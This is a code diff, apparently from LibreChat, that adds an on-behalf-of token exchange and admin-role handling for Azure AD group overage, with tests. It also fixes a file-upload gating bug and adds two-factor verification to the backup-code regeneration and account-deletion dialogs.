@ -344,7 +405,7 @@ async function resolveGroupsFromOverage(accessToken) {
const fetchOptions = { const fetchOptions = {
method: 'POST', method: 'POST',
headers: { headers: {
Authorization: `Bearer ${accessToken}`, Authorization: `Bearer ${graphToken}`,
'Content-Type': 'application/json', 'Content-Type': 'application/json',
}, },
body: JSON.stringify({ securityEnabledOnly: false }), body: JSON.stringify({ securityEnabledOnly: false }),
@ -364,6 +425,7 @@ async function resolveGroupsFromOverage(accessToken) {
} }
const data = await response.json(); const data = await response.json();
const values = Array.isArray(data?.value) ? data.value : null; const values = Array.isArray(data?.value) ? data.value : null;
if (!values) { if (!values) {
logger.error( logger.error(
@ -432,6 +494,8 @@ async function processOpenIDAuth(tokenset, existingUsersOnly = false) {
const fullName = getFullName(userinfo); const fullName = getFullName(userinfo);
const requiredRole = process.env.OPENID_REQUIRED_ROLE; const requiredRole = process.env.OPENID_REQUIRED_ROLE;
let resolvedOverageGroups = null;
if (requiredRole) { if (requiredRole) {
const requiredRoles = requiredRole const requiredRoles = requiredRole
.split(',') .split(',')
@ -451,19 +515,21 @@ async function processOpenIDAuth(tokenset, existingUsersOnly = false) {
// Handle Azure AD group overage for ID token groups: when hasgroups or _claim_* indicate overage, // Handle Azure AD group overage for ID token groups: when hasgroups or _claim_* indicate overage,
// resolve groups via Microsoft Graph instead of relying on token group values. // resolve groups via Microsoft Graph instead of relying on token group values.
const hasOverage =
decodedToken?.hasgroups ||
(decodedToken?._claim_names?.groups &&
decodedToken?._claim_sources?.[decodedToken._claim_names.groups]);
if ( if (
!Array.isArray(roles) &&
typeof roles !== 'string' &&
requiredRoleTokenKind === 'id' && requiredRoleTokenKind === 'id' &&
requiredRoleParameterPath === 'groups' && requiredRoleParameterPath === 'groups' &&
decodedToken && decodedToken &&
(decodedToken.hasgroups || hasOverage
(decodedToken._claim_names?.groups &&
decodedToken._claim_sources?.[decodedToken._claim_names.groups]))
) { ) {
const overageGroups = await resolveGroupsFromOverage(tokenset.access_token); const overageGroups = await resolveGroupsFromOverage(tokenset.access_token, claims.sub);
if (overageGroups) { if (overageGroups) {
roles = overageGroups; roles = overageGroups;
resolvedOverageGroups = overageGroups;
} }
} }
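The `hasOverage` expression introduced above recognizes both ways Azure AD signals group overage: the legacy `hasgroups` claim, and a `_claim_names`/`_claim_sources` pair whose `groups` entry points at a resolution endpoint. Extracted as a standalone predicate (a sketch; the function name is an illustration, not from the diff):

```javascript
// Sketch of the overage check: a decoded token signals group overage either
// via the legacy `hasgroups` claim or via a matching
// `_claim_names.groups` -> `_claim_sources[...]` pair.
function hasGroupOverage(decodedToken) {
  if (!decodedToken) {
    return false;
  }
  return Boolean(
    decodedToken.hasgroups ||
      (decodedToken._claim_names?.groups &&
        decodedToken._claim_sources?.[decodedToken._claim_names.groups]),
  );
}
```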
@ -550,7 +616,25 @@ async function processOpenIDAuth(tokenset, existingUsersOnly = false) {
throw new Error('Invalid admin role token kind'); throw new Error('Invalid admin role token kind');
} }
const adminRoles = get(adminRoleObject, adminRoleParameterPath); let adminRoles = get(adminRoleObject, adminRoleParameterPath);
// Handle Azure AD group overage for admin role when using ID token groups
if (adminRoleTokenKind === 'id' && adminRoleParameterPath === 'groups' && adminRoleObject) {
const hasAdminOverage =
adminRoleObject.hasgroups ||
(adminRoleObject._claim_names?.groups &&
adminRoleObject._claim_sources?.[adminRoleObject._claim_names.groups]);
if (hasAdminOverage) {
const overageGroups =
resolvedOverageGroups ||
(await resolveGroupsFromOverage(tokenset.access_token, claims.sub));
if (overageGroups) {
adminRoles = overageGroups;
}
}
}
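The `resolvedOverageGroups || (await resolveGroupsFromOverage(...))` pattern above avoids a second Graph round-trip when the required-role check already resolved the user's groups. The reuse can be sketched as follows (synchronous for brevity; the real code awaits Graph, and the function name is an illustration):

```javascript
// Sketch of the reuse logic: prefer groups already resolved for the
// required-role check; call the resolver only when nothing was cached.
function resolveAdminOverageGroups(resolvedOverageGroups, resolveFromGraph) {
  return resolvedOverageGroups || resolveFromGraph();
}
```

The accompanying test ("no duplicate Graph call") asserts exactly this: `undici.fetch` fires once even when both the required role and the admin role need overage resolution.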
let adminRoleValues = []; let adminRoleValues = [];
if (Array.isArray(adminRoles)) { if (Array.isArray(adminRoles)) {
adminRoleValues = adminRoles; adminRoleValues = adminRoles;


@ -64,6 +64,10 @@ jest.mock('openid-client', () => {
// Only return additional properties, but don't override any claims // Only return additional properties, but don't override any claims
return Promise.resolve({}); return Promise.resolve({});
}), }),
genericGrantRequest: jest.fn().mockResolvedValue({
access_token: 'exchanged_graph_token',
expires_in: 3600,
}),
customFetch: Symbol('customFetch'), customFetch: Symbol('customFetch'),
}; };
}); });
@ -730,7 +734,7 @@ describe('setupOpenId', () => {
expect.objectContaining({ expect.objectContaining({
method: 'POST', method: 'POST',
headers: expect.objectContaining({ headers: expect.objectContaining({
Authorization: `Bearer ${tokenset.access_token}`, Authorization: 'Bearer exchanged_graph_token',
}), }),
}), }),
); );
@ -745,6 +749,313 @@ describe('setupOpenId', () => {
); );
}); });
describe('OBO token exchange for overage', () => {
it('exchanges access token via OBO before calling Graph API', async () => {
const openidClient = require('openid-client');
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['group-required'] }),
});
await validate(tokenset);
expect(openidClient.genericGrantRequest).toHaveBeenCalledWith(
expect.anything(),
'urn:ietf:params:oauth:grant-type:jwt-bearer',
expect.objectContaining({
scope: 'https://graph.microsoft.com/User.Read',
assertion: tokenset.access_token,
requested_token_use: 'on_behalf_of',
}),
);
expect(undici.fetch).toHaveBeenCalledWith(
'https://graph.microsoft.com/v1.0/me/getMemberObjects',
expect.objectContaining({
headers: expect.objectContaining({
Authorization: 'Bearer exchanged_graph_token',
}),
}),
);
});
it('caches the exchanged token and reuses it on subsequent calls', async () => {
const openidClient = require('openid-client');
const getLogStores = require('~/cache/getLogStores');
const mockSet = jest.fn();
const mockGet = jest
.fn()
.mockResolvedValueOnce(undefined)
.mockResolvedValueOnce({ access_token: 'exchanged_graph_token' });
getLogStores.mockReturnValue({ get: mockGet, set: mockSet });
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['group-required'] }),
});
// First call: cache miss → OBO exchange → cache set
await validate(tokenset);
expect(mockSet).toHaveBeenCalledWith(
'1234:overage',
{ access_token: 'exchanged_graph_token' },
3600000,
);
expect(openidClient.genericGrantRequest).toHaveBeenCalledTimes(1);
// Second call: cache hit → no new OBO exchange
openidClient.genericGrantRequest.mockClear();
await validate(tokenset);
expect(openidClient.genericGrantRequest).not.toHaveBeenCalled();
});
});
describe('admin role group overage', () => {
it('resolves admin groups via Graph when overage is detected for admin role', async () => {
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
process.env.OPENID_ADMIN_ROLE = 'admin-group-id';
process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['group-required', 'admin-group-id'] }),
});
const { user } = await validate(tokenset);
expect(user.role).toBe('ADMIN');
});
it('does not grant admin when overage groups do not contain admin role', async () => {
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
process.env.OPENID_ADMIN_ROLE = 'admin-group-id';
process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['group-required', 'other-group'] }),
});
const { user } = await validate(tokenset);
expect(user).toBeTruthy();
expect(user.role).toBeUndefined();
});
it('reuses already-resolved overage groups for admin role check (no duplicate Graph call)', async () => {
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
process.env.OPENID_ADMIN_ROLE = 'admin-group-id';
process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['group-required', 'admin-group-id'] }),
});
await validate(tokenset);
// Graph API should be called only once (for the required role); the admin role check reuses the result
expect(undici.fetch).toHaveBeenCalledTimes(1);
});
it('demotes existing admin when overage groups no longer contain admin role', async () => {
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
process.env.OPENID_ADMIN_ROLE = 'admin-group-id';
process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id';
const existingAdminUser = {
_id: 'existingAdminId',
provider: 'openid',
email: tokenset.claims().email,
openidId: tokenset.claims().sub,
username: 'adminuser',
name: 'Admin User',
role: 'ADMIN',
};
findUser.mockImplementation(async (query) => {
if (query.openidId === tokenset.claims().sub || query.email === tokenset.claims().email) {
return existingAdminUser;
}
return null;
});
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['group-required'] }),
});
const { user } = await validate(tokenset);
expect(user.role).toBe('USER');
});
it('does not attempt overage for admin role when token kind is not id', async () => {
process.env.OPENID_REQUIRED_ROLE = 'requiredRole';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'roles';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
process.env.OPENID_ADMIN_ROLE = 'admin';
process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'access';
jwtDecode.mockReturnValue({
roles: ['requiredRole'],
hasgroups: true,
});
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
const { user } = await validate(tokenset);
// No Graph call since admin uses access token (not id)
expect(undici.fetch).not.toHaveBeenCalled();
expect(user.role).toBeUndefined();
});
it('resolves admin via Graph independently when OPENID_REQUIRED_ROLE is not configured', async () => {
delete process.env.OPENID_REQUIRED_ROLE;
process.env.OPENID_ADMIN_ROLE = 'admin-group-id';
process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['admin-group-id'] }),
});
const { user } = await validate(tokenset);
expect(user.role).toBe('ADMIN');
expect(undici.fetch).toHaveBeenCalledTimes(1);
});
it('denies admin when OPENID_REQUIRED_ROLE is absent and Graph does not contain admin group', async () => {
delete process.env.OPENID_REQUIRED_ROLE;
process.env.OPENID_ADMIN_ROLE = 'admin-group-id';
process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
undici.fetch.mockResolvedValue({
ok: true,
status: 200,
statusText: 'OK',
json: async () => ({ value: ['other-group'] }),
});
const { user } = await validate(tokenset);
expect(user).toBeTruthy();
expect(user.role).toBeUndefined();
});
it('denies login and logs error when OBO exchange throws', async () => {
const openidClient = require('openid-client');
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
openidClient.genericGrantRequest.mockRejectedValueOnce(new Error('OBO exchange rejected'));
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
const { user, details } = await validate(tokenset);
expect(user).toBe(false);
expect(details.message).toBe('You must have "group-required" role to log in.');
expect(undici.fetch).not.toHaveBeenCalled();
});
it('denies login when OBO exchange returns no access_token', async () => {
const openidClient = require('openid-client');
process.env.OPENID_REQUIRED_ROLE = 'group-required';
process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups';
process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id';
jwtDecode.mockReturnValue({ hasgroups: true });
openidClient.genericGrantRequest.mockResolvedValueOnce({ expires_in: 3600 });
await setupOpenId();
verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid');
const { user, details } = await validate(tokenset);
expect(user).toBe(false);
expect(details.message).toBe('You must have "group-required" role to log in.');
expect(undici.fetch).not.toHaveBeenCalled();
});
});
it('should attempt to download and save the avatar if picture is provided', async () => { it('should attempt to download and save the avatar if picture is provided', async () => {
// Act // Act
const { user } = await validate(tokenset); const { user } = await validate(tokenset);


@ -1,5 +1,4 @@
// --- Mocks --- // --- Mocks ---
jest.mock('tiktoken');
jest.mock('fs'); jest.mock('fs');
jest.mock('path'); jest.mock('path');
jest.mock('node-fetch'); jest.mock('node-fetch');


@ -91,7 +91,7 @@ function AttachFileChat({
if (isAssistants && endpointSupportsFiles && !isUploadDisabled) { if (isAssistants && endpointSupportsFiles && !isUploadDisabled) {
return <AttachFile disabled={disableInputs} />; return <AttachFile disabled={disableInputs} />;
} else if (isAgents || (endpointSupportsFiles && !isUploadDisabled)) { } else if ((isAgents || endpointSupportsFiles) && !isUploadDisabled) {
return ( return (
<AttachFileMenu <AttachFileMenu
endpoint={endpoint} endpoint={endpoint}
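The one-character-looking change in this hunk is an operator-precedence fix: with the old grouping, `isAgents` short-circuited past the upload-disabled check entirely, so an agents endpoint rendered the attach menu even when uploads were disabled. A minimal distillation of the two groupings:

```javascript
// Old grouping: isAgents bypasses the uploadDisabled guard entirely.
const shouldRenderMenuOld = (isAgents, supportsFiles, uploadDisabled) =>
  isAgents || (supportsFiles && !uploadDisabled);

// Fixed grouping: both branches are gated on uploads being enabled.
const shouldRenderMenuNew = (isAgents, supportsFiles, uploadDisabled) =>
  (isAgents || supportsFiles) && !uploadDisabled;
```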


@ -13,7 +13,7 @@ const mockEndpointsConfig: TEndpointsConfig = {
Moonshot: { type: EModelEndpoint.custom, userProvide: false, order: 9999 }, Moonshot: { type: EModelEndpoint.custom, userProvide: false, order: 9999 },
}; };
const mockFileConfig = mergeFileConfig({ const defaultFileConfig = mergeFileConfig({
endpoints: { endpoints: {
Moonshot: { fileLimit: 5 }, Moonshot: { fileLimit: 5 },
[EModelEndpoint.agents]: { fileLimit: 20 }, [EModelEndpoint.agents]: { fileLimit: 20 },
@ -21,6 +21,8 @@ const mockFileConfig = mergeFileConfig({
}, },
}); });
let mockFileConfig = defaultFileConfig;
let mockAgentsMap: Record<string, Partial<Agent>> = {}; let mockAgentsMap: Record<string, Partial<Agent>> = {};
let mockAgentQueryData: Partial<Agent> | undefined; let mockAgentQueryData: Partial<Agent> | undefined;
@ -65,6 +67,7 @@ function renderComponent(conversation: Record<string, unknown> | null, disableIn
describe('AttachFileChat', () => { describe('AttachFileChat', () => {
beforeEach(() => { beforeEach(() => {
mockFileConfig = defaultFileConfig;
mockAgentsMap = {}; mockAgentsMap = {};
mockAgentQueryData = undefined; mockAgentQueryData = undefined;
mockAttachFileMenuProps = {}; mockAttachFileMenuProps = {};
@ -148,6 +151,60 @@ describe('AttachFileChat', () => {
}); });
}); });
describe('upload disabled rendering', () => {
it('renders null for agents endpoint when fileConfig.agents.disabled is true', () => {
mockFileConfig = mergeFileConfig({
endpoints: {
[EModelEndpoint.agents]: { disabled: true },
},
});
const { container } = renderComponent({
endpoint: EModelEndpoint.agents,
agent_id: 'agent-1',
});
expect(container.innerHTML).toBe('');
});
it('renders null for agents endpoint when disableInputs is true', () => {
const { container } = renderComponent(
{ endpoint: EModelEndpoint.agents, agent_id: 'agent-1' },
true,
);
expect(container.innerHTML).toBe('');
});
it('renders AttachFile for assistants endpoint when not disabled', () => {
renderComponent({ endpoint: EModelEndpoint.assistants });
expect(screen.getByTestId('attach-file')).toBeInTheDocument();
});
it('renders AttachFileMenu when provider-specific config overrides agents disabled', () => {
mockFileConfig = mergeFileConfig({
endpoints: {
Moonshot: { disabled: false, fileLimit: 5 },
[EModelEndpoint.agents]: { disabled: true },
},
});
mockAgentsMap = {
'agent-1': { provider: 'Moonshot', model_parameters: {} } as Partial<Agent>,
};
renderComponent({ endpoint: EModelEndpoint.agents, agent_id: 'agent-1' });
expect(screen.getByTestId('attach-file-menu')).toBeInTheDocument();
});
it('renders null for assistants endpoint when fileConfig.assistants.disabled is true', () => {
mockFileConfig = mergeFileConfig({
endpoints: {
[EModelEndpoint.assistants]: { disabled: true },
},
});
const { container } = renderComponent({
endpoint: EModelEndpoint.assistants,
});
expect(container.innerHTML).toBe('');
});
});
describe('endpointFileConfig resolution', () => { describe('endpointFileConfig resolution', () => {
it('passes Moonshot-specific file config for agent with Moonshot provider', () => { it('passes Moonshot-specific file config for agent with Moonshot provider', () => {
mockAgentsMap = { mockAgentsMap = {


@ -41,6 +41,7 @@ const errorMessages = {
[ErrorTypes.NO_USER_KEY]: 'com_error_no_user_key', [ErrorTypes.NO_USER_KEY]: 'com_error_no_user_key',
[ErrorTypes.INVALID_USER_KEY]: 'com_error_invalid_user_key', [ErrorTypes.INVALID_USER_KEY]: 'com_error_invalid_user_key',
[ErrorTypes.NO_BASE_URL]: 'com_error_no_base_url', [ErrorTypes.NO_BASE_URL]: 'com_error_no_base_url',
[ErrorTypes.INVALID_BASE_URL]: 'com_error_invalid_base_url',
[ErrorTypes.INVALID_ACTION]: `com_error_${ErrorTypes.INVALID_ACTION}`, [ErrorTypes.INVALID_ACTION]: `com_error_${ErrorTypes.INVALID_ACTION}`,
[ErrorTypes.INVALID_REQUEST]: `com_error_${ErrorTypes.INVALID_REQUEST}`, [ErrorTypes.INVALID_REQUEST]: `com_error_${ErrorTypes.INVALID_REQUEST}`,
[ErrorTypes.REFUSAL]: 'com_error_refusal', [ErrorTypes.REFUSAL]: 'com_error_refusal',


@ -1,12 +1,23 @@
import React, { useState } from 'react'; import React, { useState } from 'react';
import { RefreshCcw } from 'lucide-react'; import { RefreshCcw } from 'lucide-react';
import { useSetRecoilState } from 'recoil';
import { motion, AnimatePresence } from 'framer-motion'; import { motion, AnimatePresence } from 'framer-motion';
import { TBackupCode, TRegenerateBackupCodesResponse, type TUser } from 'librechat-data-provider'; import { REGEXP_ONLY_DIGITS, REGEXP_ONLY_DIGITS_AND_CHARS } from 'input-otp';
import type {
TRegenerateBackupCodesResponse,
TRegenerateBackupCodesRequest,
TBackupCode,
TUser,
} from 'librechat-data-provider';
import { import {
OGDialog, InputOTPSeparator,
InputOTPGroup,
InputOTPSlot,
OGDialogContent, OGDialogContent,
OGDialogTitle, OGDialogTitle,
OGDialogTrigger, OGDialogTrigger,
OGDialog,
InputOTP,
Button, Button,
Label, Label,
Spinner, Spinner,
@ -15,7 +26,6 @@ import {
} from '@librechat/client'; } from '@librechat/client';
import { useRegenerateBackupCodesMutation } from '~/data-provider'; import { useRegenerateBackupCodesMutation } from '~/data-provider';
import { useAuthContext, useLocalize } from '~/hooks'; import { useAuthContext, useLocalize } from '~/hooks';
import { useSetRecoilState } from 'recoil';
import store from '~/store'; import store from '~/store';
const BackupCodesItem: React.FC = () => { const BackupCodesItem: React.FC = () => {
@ -24,25 +34,30 @@ const BackupCodesItem: React.FC = () => {
const { showToast } = useToastContext(); const { showToast } = useToastContext();
const setUser = useSetRecoilState(store.user); const setUser = useSetRecoilState(store.user);
const [isDialogOpen, setDialogOpen] = useState<boolean>(false); const [isDialogOpen, setDialogOpen] = useState<boolean>(false);
const [otpToken, setOtpToken] = useState('');
const [useBackup, setUseBackup] = useState(false);
const { mutate: regenerateBackupCodes, isLoading } = useRegenerateBackupCodesMutation(); const { mutate: regenerateBackupCodes, isLoading } = useRegenerateBackupCodesMutation();
const needs2FA = !!user?.twoFactorEnabled;
const fetchBackupCodes = (auto: boolean = false) => { const fetchBackupCodes = (auto: boolean = false) => {
regenerateBackupCodes(undefined, { let payload: TRegenerateBackupCodesRequest | undefined;
if (needs2FA && otpToken.trim()) {
payload = useBackup ? { backupCode: otpToken.trim() } : { token: otpToken.trim() };
}
regenerateBackupCodes(payload, {
onSuccess: (data: TRegenerateBackupCodesResponse) => { onSuccess: (data: TRegenerateBackupCodesResponse) => {
const newBackupCodes: TBackupCode[] = data.backupCodesHash.map((codeHash) => ({ const newBackupCodes: TBackupCode[] = data.backupCodesHash;
codeHash,
used: false,
usedAt: null,
}));
setUser((prev) => ({ ...prev, backupCodes: newBackupCodes }) as TUser); setUser((prev) => ({ ...prev, backupCodes: newBackupCodes }) as TUser);
setOtpToken('');
showToast({ showToast({
message: localize('com_ui_backup_codes_regenerated'), message: localize('com_ui_backup_codes_regenerated'),
status: 'success', status: 'success',
}); });
// Trigger the file download only when the user explicitly clicks the button.
if (!auto && newBackupCodes.length) { if (!auto && newBackupCodes.length) {
const codesString = data.backupCodes.join('\n'); const codesString = data.backupCodes.join('\n');
const blob = new Blob([codesString], { type: 'text/plain;charset=utf-8' }); const blob = new Blob([codesString], { type: 'text/plain;charset=utf-8' });
@ -66,6 +81,8 @@ const BackupCodesItem: React.FC = () => {
fetchBackupCodes(false); fetchBackupCodes(false);
}; };
const otpReady = !needs2FA || otpToken.length === (useBackup ? 8 : 6);
return ( return (
<OGDialog open={isDialogOpen} onOpenChange={setDialogOpen}> <OGDialog open={isDialogOpen} onOpenChange={setDialogOpen}>
<div className="flex items-center justify-between"> <div className="flex items-center justify-between">
@ -161,10 +178,10 @@ const BackupCodesItem: React.FC = () => {
); );
})} })}
</div> </div>
<div className="mt-12 flex justify-center"> <div className="mt-6 flex justify-center">
<Button <Button
onClick={handleRegenerate} onClick={handleRegenerate}
disabled={isLoading} disabled={isLoading || !otpReady}
variant="default" variant="default"
className="px-8 py-3 transition-all disabled:opacity-50" className="px-8 py-3 transition-all disabled:opacity-50"
> >
@ -183,7 +200,7 @@ const BackupCodesItem: React.FC = () => {
<div className="flex flex-col items-center gap-4 p-6 text-center"> <div className="flex flex-col items-center gap-4 p-6 text-center">
<Button <Button
onClick={handleRegenerate} onClick={handleRegenerate}
disabled={isLoading} disabled={isLoading || !otpReady}
variant="default" variant="default"
className="px-8 py-3 transition-all disabled:opacity-50" className="px-8 py-3 transition-all disabled:opacity-50"
> >
@ -192,6 +209,59 @@ const BackupCodesItem: React.FC = () => {
</Button> </Button>
</div> </div>
)} )}
{needs2FA && (
<div className="mt-6 space-y-3">
<Label className="text-sm font-medium">
{localize('com_ui_2fa_verification_required')}
</Label>
<div className="flex justify-center">
<InputOTP
value={otpToken}
onChange={setOtpToken}
maxLength={useBackup ? 8 : 6}
pattern={useBackup ? REGEXP_ONLY_DIGITS_AND_CHARS : REGEXP_ONLY_DIGITS}
className="gap-2"
>
{useBackup ? (
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
<InputOTPSlot index={6} />
<InputOTPSlot index={7} />
</InputOTPGroup>
) : (
<>
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
</InputOTPGroup>
<InputOTPSeparator />
<InputOTPGroup>
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
</InputOTPGroup>
</>
)}
</InputOTP>
</div>
<button
type="button"
onClick={() => {
setUseBackup(!useBackup);
setOtpToken('');
}}
className="text-sm text-primary hover:underline"
>
{useBackup ? localize('com_ui_use_2fa_code') : localize('com_ui_use_backup_code')}
</button>
</div>
)}
</motion.div> </motion.div>
</AnimatePresence> </AnimatePresence>
</OGDialogContent> </OGDialogContent>


@ -1,16 +1,22 @@
import { LockIcon, Trash } from 'lucide-react';
import React, { useState, useCallback } from 'react'; import React, { useState, useCallback } from 'react';
import { LockIcon, Trash } from 'lucide-react';
import { REGEXP_ONLY_DIGITS, REGEXP_ONLY_DIGITS_AND_CHARS } from 'input-otp';
import { import {
Label, InputOTPSeparator,
Input,
Button,
Spinner,
OGDialog,
OGDialogContent, OGDialogContent,
OGDialogTrigger, OGDialogTrigger,
OGDialogHeader, OGDialogHeader,
InputOTPGroup,
OGDialogTitle, OGDialogTitle,
InputOTPSlot,
OGDialog,
InputOTP,
Spinner,
Button,
Label,
Input,
} from '@librechat/client'; } from '@librechat/client';
import type { TDeleteUserRequest } from 'librechat-data-provider';
import { useDeleteUserMutation } from '~/data-provider'; import { useDeleteUserMutation } from '~/data-provider';
import { useAuthContext } from '~/hooks/AuthContext'; import { useAuthContext } from '~/hooks/AuthContext';
import { LocalizeFunction } from '~/common'; import { LocalizeFunction } from '~/common';
@ -21,16 +27,27 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea
const localize = useLocalize(); const localize = useLocalize();
const { user, logout } = useAuthContext(); const { user, logout } = useAuthContext();
const { mutate: deleteUser, isLoading: isDeleting } = useDeleteUserMutation({ const { mutate: deleteUser, isLoading: isDeleting } = useDeleteUserMutation({
onMutate: () => logout(), onSuccess: () => logout(),
}); });
const [isDialogOpen, setDialogOpen] = useState<boolean>(false); const [isDialogOpen, setDialogOpen] = useState<boolean>(false);
const [isLocked, setIsLocked] = useState(true); const [isLocked, setIsLocked] = useState(true);
const [otpToken, setOtpToken] = useState('');
const [useBackup, setUseBackup] = useState(false);
const needs2FA = !!user?.twoFactorEnabled;
const handleDeleteUser = () => { const handleDeleteUser = () => {
if (!isLocked) { if (isLocked) {
deleteUser(undefined); return;
} }
let payload: TDeleteUserRequest | undefined;
if (needs2FA && otpToken.trim()) {
payload = useBackup ? { backupCode: otpToken.trim() } : { token: otpToken.trim() };
}
deleteUser(payload);
}; };
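The payload construction above (shared in shape with `BackupCodesItem`) sends a `token` or `backupCode` field only when 2FA is enabled and the user actually typed something; otherwise the mutation receives `undefined`. As a standalone helper (a sketch; the function name is an illustration, not from the diff):

```javascript
// Sketch of the 2FA payload selection: return a token or backupCode object
// only when 2FA is on and the trimmed input is non-empty.
function buildTwoFactorPayload(needs2FA, otpToken, useBackup) {
  if (!needs2FA || !otpToken.trim()) {
    return undefined;
  }
  const code = otpToken.trim();
  return useBackup ? { backupCode: code } : { token: code };
}
```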
const handleInputChange = useCallback( const handleInputChange = useCallback(
@ -42,6 +59,8 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea
[user?.email], [user?.email],
); );
const otpReady = !needs2FA || otpToken.length === (useBackup ? 8 : 6);
return (
<>
<OGDialog open={isDialogOpen} onOpenChange={setDialogOpen}>
@@ -79,7 +98,60 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea
(e) => handleInputChange(e.target.value),
)}
</div>
{needs2FA && (
<div className="mb-4 space-y-3">
<Label className="text-sm font-medium">
{localize('com_ui_2fa_verification_required')}
</Label>
<div className="flex justify-center">
<InputOTP
value={otpToken}
onChange={setOtpToken}
maxLength={useBackup ? 8 : 6}
pattern={useBackup ? REGEXP_ONLY_DIGITS_AND_CHARS : REGEXP_ONLY_DIGITS}
className="gap-2"
>
{useBackup ? (
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
<InputOTPSlot index={6} />
<InputOTPSlot index={7} />
</InputOTPGroup>
) : (
<>
<InputOTPGroup>
<InputOTPSlot index={0} />
<InputOTPSlot index={1} />
<InputOTPSlot index={2} />
</InputOTPGroup>
<InputOTPSeparator />
<InputOTPGroup>
<InputOTPSlot index={3} />
<InputOTPSlot index={4} />
<InputOTPSlot index={5} />
</InputOTPGroup>
</>
)}
</InputOTP>
</div>
<button
type="button"
onClick={() => {
setUseBackup(!useBackup);
setOtpToken('');
}}
className="text-sm text-primary hover:underline"
>
